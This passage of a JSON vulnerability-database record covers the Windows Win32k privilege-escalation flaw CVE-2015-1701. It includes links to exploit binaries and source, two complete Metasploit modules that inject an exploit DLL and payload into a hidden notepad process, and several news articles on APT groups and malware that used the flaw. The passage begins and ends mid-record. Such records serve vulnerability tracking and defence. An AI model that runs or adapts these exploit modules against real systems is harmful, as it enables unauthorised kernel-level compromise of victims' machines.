Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-64.exe\n\n## Source Code: \n+ https://github.com/hfiref0x/CVE-2015-1701/archive/master.zip\n+ EDB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/37049-src.zip", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-10-14T22:31:47", "description": "This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.\n", "published": "2015-06-03T11:48:23", "type": "metasploit", "title": "Windows ClientCopyImage Win32k Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/MS15_051_CLIENT_COPY_IMAGE", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\n 'Description' => %q{\n This module exploits improper object handling in the win32k.sys kernel mode driver.\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\n Windows 2008 R2 SP1 x64.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Unknown', # vulnerability discovery and exploit in the wild\n 'hfirefox', # Code released on github\n 'OJ Reeves', # msf module\n 'Spencer McIntyre' # msf module\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' => [\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' => [\n ['CVE', '2015-1701'],\n ['MSB', 'MS15-051'],\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\n ],\n 'DisclosureDate' => '2015-05-12',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n },\n }))\n end\n\n def check\n # Windows XP SP3 (32-bit) 5.1.2600.6514 (Works)\n # Windows Server 2003 Standard SP2 (32-bit) 5.2.3790.5445 (Works)\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\n # Windows 7 SP1 (64-bit) 6.1.7601.17514 (Works)\n # Windows 7 SP1 (64-bit) 6.1.7601.17535 (Works)\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\n # Windows 7 SP1 (32-bit) 6.1.7601.18388 (Works)\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.18105 (Works)\n\n if sysinfo['OS'] !~ /windows/i\n return Exploit::CheckCode::Unknown\n end\n\n if sysinfo['Architecture'] =~ /(wow|x)64/i\n arch = ARCH_X64\n elsif sysinfo['Architecture'] =~ /x86/i\n arch = ARCH_X86\n end\n\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n return Exploit::CheckCode::Safe if build > 7601\n\n return Exploit::CheckCode::Appears\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n check_result = check\n if check_result == Exploit::CheckCode::Safe || check_result == Exploit::CheckCode::Unknown\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\n end\n\n if sysinfo['Architecture'] == ARCH_X64\n if session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n end\n\n if target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n end\n elsif target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n if target.arch.first == ARCH_X86\n dll_file_name = 'cve-2015-1701.x86.dll'\n else\n dll_file_name = 'cve-2015-1701.x64.dll'\n end\n\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms15_051_client_copy_image.rb"}], "exploitdb": [{"lastseen": "2016-02-04T05:40:47", "description": "Windows ClientCopyImage Win32k Exploit. CVE-2015-1701. Local exploit for windows platform", "published": "2015-06-24T00:00:00", "type": "exploitdb", "title": "Windows ClientCopyImage Win32k Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1701"], "modified": "2015-06-24T00:00:00", "id": "EDB-ID:37367", "href": "https://www.exploit-db.com/exploits/37367/", "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'msf/core/post/windows/reflective_dll_injection'\r\nrequire 'rex'\r\n\r\nclass Metasploit3 < Msf::Exploit::Local\r\n Rank = NormalRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Windows::Priv\r\n include Msf::Post::Windows::Process\r\n include Msf::Post::Windows::FileInfo\r\n include Msf::Post::Windows::ReflectiveDLLInjection\r\n\r\n def initialize(info={})\r\n super(update_info(info, {\r\n 'Name' => 'Windows ClientCopyImage Win32k Exploit',\r\n 'Description' => %q{\r\n This module exploits improper object handling in the win32k.sys kernel mode driver.\r\n This module has been tested on vulnerable builds of Windows 7 x64 and x86, and\r\n Windows 2008 R2 SP1 x64.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'Unknown', # vulnerability discovery and exploit in the wild\r\n 'hfirefox', # Code released on github\r\n 'OJ Reeves' # msf module\r\n ],\r\n 'Arch' => [ ARCH_X86, ARCH_X86_64 ],\r\n 'Platform' => 'win',\r\n 'SessionTypes' => [ 'metrepreter' ],\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n },\r\n 'Targets' => [\r\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\r\n [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]\r\n ],\r\n 'Payload' => {\r\n 'Space' => 4096,\r\n 'DisableNops' => true\r\n },\r\n 'References' => [\r\n ['CVE', '2015-1701'],\r\n ['MSB', 'MS15-051'],\r\n ['URL', 'https://www.fireeye.com/blog/threat-research/2015/04/probable_apt28_useo.html'],\r\n ['URL', 'https://github.com/hfiref0x/CVE-2015-1701'],\r\n ['URL', 'https://technet.microsoft.com/library/security/MS15-051']\r\n ],\r\n 'DisclosureDate' => 'May 12 2015',\r\n 'DefaultTarget' => 0\r\n }))\r\n end\r\n\r\n def check\r\n # Windows Server 2008 Enterprise SP2 (32-bit) 6.0.6002.18005 (Does not work)\r\n # Winodws 7 SP1 (64-bit) 6.1.7601.17514 (Works)\r\n # Windows 7 SP1 (32-bit) 6.1.7601.17514 (Works)\r\n # Windows Server 2008 R2 (64-bit) SP1 6.1.7601.17514 (Works)\r\n\r\n if sysinfo['OS'] !~ /windows/i\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /(wow|x)64/i\r\n arch = ARCH_X86_64\r\n elsif sysinfo['Architecture'] =~ /x86/i\r\n arch = ARCH_X86\r\n end\r\n\r\n file_path = expand_path('%windir%') << '\\\\system32\\\\win32k.sys'\r\n major, minor, build, revision, branch = file_version(file_path)\r\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\r\n\r\n return Exploit::CheckCode::Safe if build == 7601\r\n\r\n return Exploit::CheckCode::Detected\r\n end\r\n\r\n def exploit\r\n if is_system?\r\n fail_with(Failure::None, 'Session is already elevated')\r\n end\r\n\r\n if check == Exploit::CheckCode::Safe || check == Exploit::CheckCode::Unknown\r\n fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')\r\n end\r\n\r\n if sysinfo['Architecture'] =~ /wow64/i\r\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\r\n elsif sysinfo['Architecture'] =~ /x64/ && target.arch.first == ARCH_X86\r\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\r\n elsif sysinfo['Architecture'] =~ /x86/ && target.arch.first == ARCH_X86_64\r\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\r\n end\r\n\r\n print_status('Launching notepad to host the exploit...')\r\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\r\n begin\r\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\r\n print_good(\"Process #{process.pid} launched.\")\r\n rescue Rex::Post::Metrepreter::RequestError\r\n # Reader Sandbox won't allow to create a new process:\r\n # stdapi_sys_process_execute: Operation failed: Access is denied.\r\n print_status('Operation failed. Trying to elevate the current process...')\r\n process = client.sys.process.open\r\n end\r\n\r\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\r\n if target.arch.first == ARCH_X86\r\n dll_file_name = 'cve-2015-1701.x86.dll'\r\n else\r\n dll_file_name = 'cve-2015-1701.x64.dll'\r\n end\r\n\r\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-1701', dll_file_name)\r\n library_path = ::File.expand_path(library_path)\r\n\r\n print_status(\"Injecting exploit into #{process.pid}...\")\r\n exploit_mem, offset = inject_dll_into_process(process, library_path)\r\n\r\n print_status(\"Exploit injected. Injecting payload into #{process.pid}...\")\r\n payload_mem = inject_into_process(process, payload.encoded)\r\n\r\n # invoke the exploit, passing in the address of the payload that\r\n # we want invoked on successful exploitation.\r\n print_status('Payload injected. Executing exploit...')\r\n process.thread.create(exploit_mem + offset, payload_mem)\r\n\r\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\r\n end\r\n\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/37367/"}], "threatpost": [{"lastseen": "2018-10-06T22:55:18", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2015-2545"], "description": "A Microsoft Office vulnerability [patched six months ago](<https://threatpost.com/microsoft-patches-graphics-component-flaw-under-attack/114575/>) continues to be a valuable tool for APT gangs operating primarily in Southeast Asia and the Far East.\n\nResearchers at Kaspersky Lab today published a [report](<https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/>) describing how attackers continue to flourish exploiting [CVE-2015-2545](<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2545>), a remote code execution vulnerability where an attacker crafts an EPS image file embedded in an Office document designed to bypass memory protections on Windows systems.\n\nExploits have been used primarily to gain an initial foothold on targeted systems. Those targets are largely government and diplomatic agencies and individuals in India and Asia, as well as satellite offices of those agencies in Europe and elsewhere.\n\nThe Office flaw was patched in September in [MS15-099](<https://technet.microsoft.com/library/security/ms15-099>) and updated again in November. Yet APT groups seem to be capitalizing on lax patching inside these high-profile organizations to carry out espionage. Some criminal organizations have also made use of exploits against this particular flaw, in particular against financial organizations in Asia, Kaspersky researchers said in their report.\n\nThe APT groups, however, seem to be having the most ongoing success with CVE-2015-2545. Kaspersky Lab identified a half-dozen groups, including two new outfits, that have been using modified exploits for the flaw.\n\nThe new players are known as Danti and SVCMONDR. Danti is a relative newcomer operating since 2015 and primarily against Indian government organizations. It has recently branched out against targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines, Kaspersky said.\n\nIn February and March, researchers saw Danti attacks moving via spear-phishing emails laced with a .docx file that exploits the Microsoft flaw and drops custom shellcode on compromised machines.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2016/05/06235523/danti_timeline.png>)\n\n\u201cThe exploit is based on a malformed embedded EPS (Encapsulated Postscript) object,\u201d Kaspersky researchers wrote in their report. \u201cThis contains the shellcode that drops a backdoor, providing full access to the attackers.\u201d\n\nThe February attacks were concentrated against the Indian Ministry of External Affairs starting Feb. 2 and concluding Feb. 29, the report says. Indian embassies in Hungary, Denmark and Colombia were also targeted.\n\nThe emails contained relevant subject lines to the targets and spoofed legitimate email addresses belonging to high-ranking officials, including the IT director of India\u2019s Ministry of Communications and Information Technology.\n\nIn March, the Danti group struck again, in particular against a number of people inside the Cabinet Secretariat of Government India from an email spoofing a high-ranking government official. A modified version of previous EPS exploits dropped a backdoor and other capabilities that monitored system information and gave the attackers the ability to modify files, execute commands, terminate processes and gain a shell.\n\nSVCMONDR used spear-phishing messages to hit targets in Taiwan with exploits that hint at a connection to the Danti group as well as APT 16, what is thought to be a separate APT gang. However, its emails came from the same domain as the SVCMONDR attackers, using different shellcode and dropping a new backdoor.\n\nThe EPS exploits drop a program called SVCMONDR.exe that embeds itself in the registry for persistence and that establishes a backdoor through which commands and stolen files are sent.\n\nKaspersky\u2019s report also implicates the [Platinum APT group](<https://threatpost.com/platinum-apt-group-abuses-windows-hotpatching/117692/>) as the first to exploit CVE-2015-2545. Platinum was identified by Microsoft; it used EPS exploits against targets in India as early as last August. A recent Microsoft reports described some of Platinum\u2019s exploits, including its ability to abuse a hotpatching feature introduced in Windows in 2003 and available until it was removed in Windows 8. The abuse of hotpatching allows the attackers to inject malicious code into running processes without having to reboot the server. Hotpatching requires admin privileges, therefore the attackers have to already be on the box to make use of this technique. \nKaspersky also said in addition to APT 16, which targeted news agencies in Taiwan late last year, another APT group known as EvilPost has been exploiting the EPS flaw.\n\nEvilPost used the EPS exploit to hit defense contractors in Japan; in one attack described by Kaspersky, EvilPost attackers used an embedded and maliciously crafted EPS object embedded in an Office document to run a shell on compromised machines and drop a separate DLL that exploited CVE-2015-1701, a privilege escalation vulnerability. With elevated permissions, the attackers were then able to backdoor systems and reach out to command servers to download more malware.\n\nThe Kaspersky report, however, said that the attackers no longer have access to a command server in Japan and theorize either it was compromised or the attackers abandoned their mission after researchers discovered it.\n\nThe remaining APT group outed by Kaspersky is called Spivy; it targeted organizations in Hong Kong and used a variant of the Poison Ivy backdoor to steal information.\n\n[Technical information and indicators of compromise](<https://securelist.com/analysis/publications/74828/cve-2015-2545-overview-of-current-threats/>) are available on Securelist.com.\n", "modified": "2016-05-27T16:18:13", "published": "2016-05-25T12:58:57", "id": "THREATPOST:5BEEE925F2AFCC46C5E8886ADAA43B84", "href": "https://threatpost.com/apt-groups-finding-success-with-patched-microsoft-flaw/118298/", "type": "threatpost", "title": "APT Groups Exploiting Patch Microsoft Office Flaw CVE-2015-2545", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:04", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "A malware dropper with designs on specific targets was found in a private underground forum and is likely the predecessor to the Furtim malware that was uncovered in May.\n\nResearchers at SentinelOne today published a [report](<https://sentinelone.com/blogs/sfg-furtims-parent/>) that says the dropper sample they investigated, which they\u2019re calling SFG, was built to target at least one unnamed European energy company. The report says the dropper is likely the work of a state-sponsored group and is used as the first stage of targeted attacks.\n\nThe dropper\u2019s principle mission is to avoid detection; it will not execute if it senses it\u2019s being run in a virtualized environment such as a sandbox, and it also can bypass antivirus protection running on compromised machines.\n\nThe sample also includes a pair of privilege escalation exploits for patched Windows vulnerabilities (CVE-2014-4113 and CVE-2015-1701), as well as a bypass for Windows User Account Control (UAC), which limits user privileges.\n\n\u201cIt escalates privileges after all these checks and registers a hidden binary that it drops onto the hard drive that runs early in the boot process,\u201d SentinelOne senior security researcher Joseph Landry said. \u201cIt will go through and systematically remove any AV on the machine that it targets. Then it drops another payload to the Windows directory and runs it during login time.\u201d\n\nIn this one sample, Landry said, the dropper sets the stage for the installation of the Furtim malware. Furtim was uncovered by security company enSilo, which published a [report](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) in May on the malware. The sample described by enSilo had three payloads: a power-saving configuration tool that disables sleep mode and hibernation on Windows machines in order to maintain command and control connections; the Pony malware, which steals credentials and sends them back to the attackers\u2019 server; and an unknown payload that sends a list of security processes running on the machine to the command and control server, even though the malware has theoretically already wiped AV off the machine before installing itself. In the case of the sample found by SentinelOne, its command and control servers are already offline and it\u2019s unknown what other payloads and commands it could handle. Landry said this is the first stage of a bigger attack.\n\n\u201cThis gives them a point on the network from where they can then pivot and attack other systems or do recon from,\u201d Landry said. \u201cWe\u2019re not seeing anything it\u2019s attacking, but this is where initial implant would be. They would be able to run whatever code without AV chirping.\u201d\n\nUdi Shamir, chief security officer at SentinelOne, said he\u2019s unaware of how many victims there may be.\n\n\u201cI don\u2019t have an exact numbers on the infection magnitude, but this sample was developed for more targeted attacks rather than high infection volume (still, this is an estimation),\u201d he said. \u201cThis sample seems to target large enterprise organizations, and has probably already infected a few.\u201d\n\nSince the code burrows itself in the startup much like a rootkit, Landry said it would be difficult to remove.\n\n\u201cThis is very professional, not just the techniques used to wipe AV, but the code is professional,\u201d Landry said. \u201cThe APIs here are very low level and not normally public. This was built by someone who really understands how Windows works, and how it has changed over the last few years. It\u2019s very likely a nation-state deal. Criminals don\u2019t need it to be this effective.\u201d\n", "modified": "2016-07-15T21:08:32", "published": "2016-07-12T09:31:54", "id": "THREATPOST:2DE43487E2CDBEABD59D64B1DC7CE12C", "href": "https://threatpost.com/malware-dropper-built-to-target-european-energy-company/119195/", "type": "threatpost", "title": "Malware Dropper Built to Target European Energy Company", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:54", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2017-11882"], "description": "Patch Tuesday as we know it may be on its last legs, but it\u2019s certainly not going quietly.\n\nA little more than a week after Microsoft announced how it would [revamp patch distribution and security updates](<https://threatpost.com/patch-tuesday-facelift-end-of-an-era/112640>) starting with Windows 10, the company today released its scheduled round of bulletins\u201413 in all, including [three critical updates](<https://technet.microsoft.com/library/security/ms15-may>) for vulnerabilities in Internet Explorer, Microsoft Font Drivers, and Windows Journal, all of which lead to remote code execution.\n\nWith Windows 10 due before the end of the summer, admins had better start thinking about revamping their patch assessment and prioritization processes if they\u2019re going to upgrade to the new version of the Windows OS. With Windows Update for Business, patches will be available as they\u2019re ready, and features built into the tool will allow IT managers to decide which machines are patched on quicker cycles, and which have to wait until testing is complete, for example.\n\nThat doesn\u2019t mean the vulnerability parade is likely to let up; Qualys for example, says that the pace of this year\u2019s bulletins and patches has already exceeded each of the last five years and figures to top 150 by year\u2019s end.\n\nToday\u2019s update runs the usual spectrum of products affected by the respective bulletins. The almost-habitual Internet Explorer cumulative update, [MS15-043](<https://technet.microsoft.com/library/security/MS15-043>), is likely the highest priority; it patches 22 vulnerabilities that enable not only remote code execution, but also security feature bypasses, information disclosure and elevation of privileges. For Windows clients, most of the IE bugs are rated important by Microsoft; those rated critical include 14 memory corruption vulnerabilities in IE6-11. The bulletin also takes care of a number of ASLR bypass vulnerabilities in IE or VBScript and an IE Clipboard information disclosure issue.\n\n[MS15-044](<https://technet.microsoft.com/library/security/MS15-044>) patches more TrueType font vulnerabilities, this time in Windows, .NET, Office, Lync and Silverlight, and fixes how the Windows DirectWrite library handles TrueType and OpenType fonts. TrueType font vulnerabilities have caused trouble before; in 2013, Microsoft patched a separate vulnerability that led to kernel compromises and remote code execution. Font-parsing vulnerabilities have also been part of high-profile APT-style targeted attacks, including Duqu.\n\nThe TrueType bug is the more serious of the two, and could lead to remote code execution if the respective products fail to properly handle TrueType fonts, Microsoft said. The OpenType bug is an information disclosure flaw and could allow an attacker to read data meant to be private; hackers could not exploit this to run code or elevate privileges, Microsoft said.\n\nThe final critical bulletin, [MS15-045](<https://technet.microsoft.com/library/security/MS15-045>), is another remote code execution issue, this time in Windows Journal, Microsoft\u2019s note-taking program, and can be exploited if a user opens a malicious Journal file. The bulletin patches six vulnerabilities; Microsoft proposes a temporary workaround of either not opening Journal files or removing the .jnt file association.\n\n\u201cThe vulnerability with Windows Journal is particularly interesting in the target scenario, where an administrator is opening a journal file to determine or diagnose a problem, and the tools we\u2019re given to manage problems are at the same time being used to penetrate the target host, and open you up for further attacks,\u201d said Jon Rudolph, principal software engineer at Core Security. \u201cThis most likely would not be aimed at the typical user, but someone with admin permissions.\u201d\n\nExperts warn that the Office bulletin [MS15-046](<https://technet.microsoft.com/library/security/MS15-046>), though rated important, should merit a second look because it enables remote code execution, as does the SharePoint bulletin, [MS15-047](<https://technet.microsoft.com/library/security/MS15-047>).\n\nThe Office and SharePoint bulletins, however, are replacements for a number of older bulletins released earlier this year. If admins have not yet applied the older updates, they need apply only today\u2019s.\n\nAnother bulletin rated important that deserves extra attention is [MS15-051](<https://technet.microsoft.com/library/security/MS15-051>), which patches six elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, one of which, CVE-2015-1701, has been publicly disclosed and Microsoft said it is aware of limited targeted attacks going after this bug. The patch addresses an issue where the kernel-mode driver improperly handles objects n memory; an attacker with local access could then run code in kernel mode.\n\nThe remaining Important bulletins are as follows:\n\n * [MS15-048](<https://technet.microsoft.com/library/security/MS15-048>): Patches elevation of privileges vulnerabilities in .NET\n * [MS15-049](<https://technet.microsoft.com/library/security/MS15-049>): Patches elevation of privileges vulnerability in Silverlight\n * [MS15-050](<https://technet.microsoft.com/library/security/MS15-050>): Patches elevation of privileges vulnerability in Service Control Manager\n * [MS15-052](<https://technet.microsoft.com/library/security/MS15-052>): Patches security feature bypass in Windows Kernel\n * [MS15-053:](<https://technet.microsoft.com/library/security/MS15-053>) Patches security feature bypass vulnerabilities in Jscript and VBScript scripting engines\n * [MS15-054:](<https://technet.microsoft.com/library/security/MS15-054>) Patches denial of service vulnerability in Microsoft Management Console file format\n * [MS15-055](<https://technet.microsoft.com/library/security/MS15-055>): Patches information disclosure vulnerability in Schannel\n", "modified": "2015-05-12T18:49:45", "published": "2015-05-12T14:49:45", "id": "THREATPOST:7A640DBB2223135AD8DC65457AB55EBF", "href": "https://threatpost.com/microsoft-patches-remote-code-execution-bugs-in-ie-font-drivers-windows-journal/112762/", "type": "threatpost", "title": "May 2015 Microsoft Patch Tuesday Security Bulletins", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:02", "bulletinFamily": "info", "cvelist": ["CVE-2014-4113", "CVE-2015-1701"], "description": "New research is challenging what security researchers know about Furtim, a new malware strain that has been compared to Stuxnet because of its believed targeting of industrial controls in energy companies.\n\nAccording to security experts at Damballa, Furtim and the recently discovered SFG malware are one in the same \u2013 only varying by a few lines of code that include the HTTP header information.\n\nThe research clarifies earlier investigations that distinguished Furtim and SFG as closely related, but separate malware strains. Researcher Don Jackson, senior threat researcher at Damballa, says further analysis shows that they are the same.\n\n\u201cThe only difference between them is in the HTTP header. Those headers simply have different values and are chosen at random by the malware so that different builds of the same malware don\u2019t look the same on the network,\u201d Jackson said.\n\nJackson said [additional research into Furtim/SFG shows](<https://www.damballa.com/furtimsfg-using-existing-virtual-fast-flux-network/>) that the malware is not singling out energy plants as targets, as previously thought, but is trying to infect any network in an attempt to steal user credentials.\n\n\u201cThis malware is being distributed via a variety of different methods including drive-by downloads, malvertising and spam messages. It\u2019s extremely opportunistic and not specifically targeting one sector over another. It\u2019s just infecting Windows machines where ever it can find a way in,\u201d Jackson said.\n\nIt was previous believed that Furtim/SFG was malware was designed to specifically target the energy sector. On July 12, [a report by SentinelOne](<https://threatpost.com/malware-dropper-built-to-target-european-energy-company/119195/>) said a SFG dropper was targeting an unspecified European energy company. The company believed SFG was the work of a state-sponsored group that used the dropper as a first stage of a targeted attack where the Furtim malware was then downloaded.\n\nOn July 14, [SentinelOne updated its research](<https://sentinelone.com/blogs/sfg-furtims-parent/>): \u201cThere has been a number of stories published since the posting of this blog that have suggested this attack is specifically targeting SCADA energy management systems. We want to emphasize that we do not have any evidence that this is in fact the case. The focus of our analysis was on the characteristics of the malware, not the attribution or target.\u201d\n\nFurtim/SFG\u2019s principal mission was to avoid detection and execute privilege escalation exploits for patched Windows vulnerabilities (CVE-2014-4113 and CVE-2015-1701), as well as a bypass for Windows User Account Control (UAC), which limits user privileges.\n\n\u201cAs far as the number and type of tactics this malware is really state of the art. It tries almost every trick that I\u2019ve run across to stay hidden and being analyzed. It\u2019s not nation-state level, but it is extremely well put together malware,\u201d Jackson said.\n\nFurtim was uncovered by security company enSilo, which published a [report in May](<http://blog.ensilo.com/furtim-the-ultra-cautious-malware>) on the malware. The sample described by enSilo had three payloads: a power-saving configuration tool that disables sleep mode and hibernation on Windows machines in order to maintain command and control connections; the Pony malware, which steals credentials and sends them back to the attackers\u2019 server; and an unknown payload that sends a list of security processes running on the machine to the command and control server, even though the malware has theoretically already wiped AV off the machine before installing itself.\n\nAccording to Damballa researchers, the Furtim/SFG malware is being distributed by a version of the Fast Flux botnet that it is calling Dark Cloud via a Malware-as-a-Service relationship. Fast Flux uses a DNS technique used to hide criminal cybercrime activities by using an ever-changing network of compromised hosts acting as proxies.\n", "modified": "2016-07-22T19:02:00", "published": "2016-07-18T13:26:09", "id": "THREATPOST:6D624865424D6B497F552030FAE6A7EE", "href": "https://threatpost.com/researchers-crack-furtim-sfg-malware-connection/119334/", "type": "threatpost", "title": "Researchers Crack Furtim, SFG Malware Connection", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-10-14T22:23:02", "bulletinFamily": "info", "cvelist": ["CVE-2015-1701", "CVE-2018-8120", "CVE-2019-1458", "CVE-2020-0674"], "description": "The Purple Fox exploit kit (EK) has added two new exploits targeting critical- and high-severity Microsoft vulnerabilities to its bag of tricks \u2013 and researchers say they expect more attacks to be added in the future.\n\nThe Purple Fox EK was [previously analyzed](<https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/>) in September, when researchers said that it appears to have been built to [replace the Rig EK](<https://threatpost.com/inside-the-rig-exploit-kit/121805/>) in the distribution chain of Purple Fox malware, which is a trojan/rootkit. The latest revision to the exploit kit has added attacks against flaws tracked as [CVE-2020-0674](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0674>) and [CVE-2019-1458](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1458>), which were first disclosed at the end of 2019 and early 2020. Purple Fox previously [used exploits](<https://securityintelligence.com/news/purple-fox-malware-spread-by-rig-exploit-kit-capable-of-abusing-powershell/>) targeting older Microsoft flaws, including ones tracked as [CVE-2018-8120](<https://nvd.nist.gov/vuln/detail/CVE-2018-8120>) and [CVE-2015-1701](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1701>).\n\n\u201cThis tells us that the authors of Purple Fox are staying up to date on viable exploitable vulnerabilities and updating when they become available,\u201d said researchers with Proofpoint in a [Monday analysis](<https://www.proofpoint.com/us/blog/threat-insight/purple-fox-ek-adds-exploits-cve-2020-0674-and-cve-2019-1458-its-arsenal>). \u201cIt\u2019s reasonable to expect that they will continue to update as new vulnerabilities are discovered.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nCVE-2020-0674 is a [critical scripting engine memory corruption](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>) vulnerability in Internet Explorer, which was [disclosed](<https://twitter.com/msftsecresponse/status/1218296055579602944>) by Microsoft in a January 2020 out-of-band security advisory. The flaw could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user \u2013 meaning that an adversary could [gain the same user 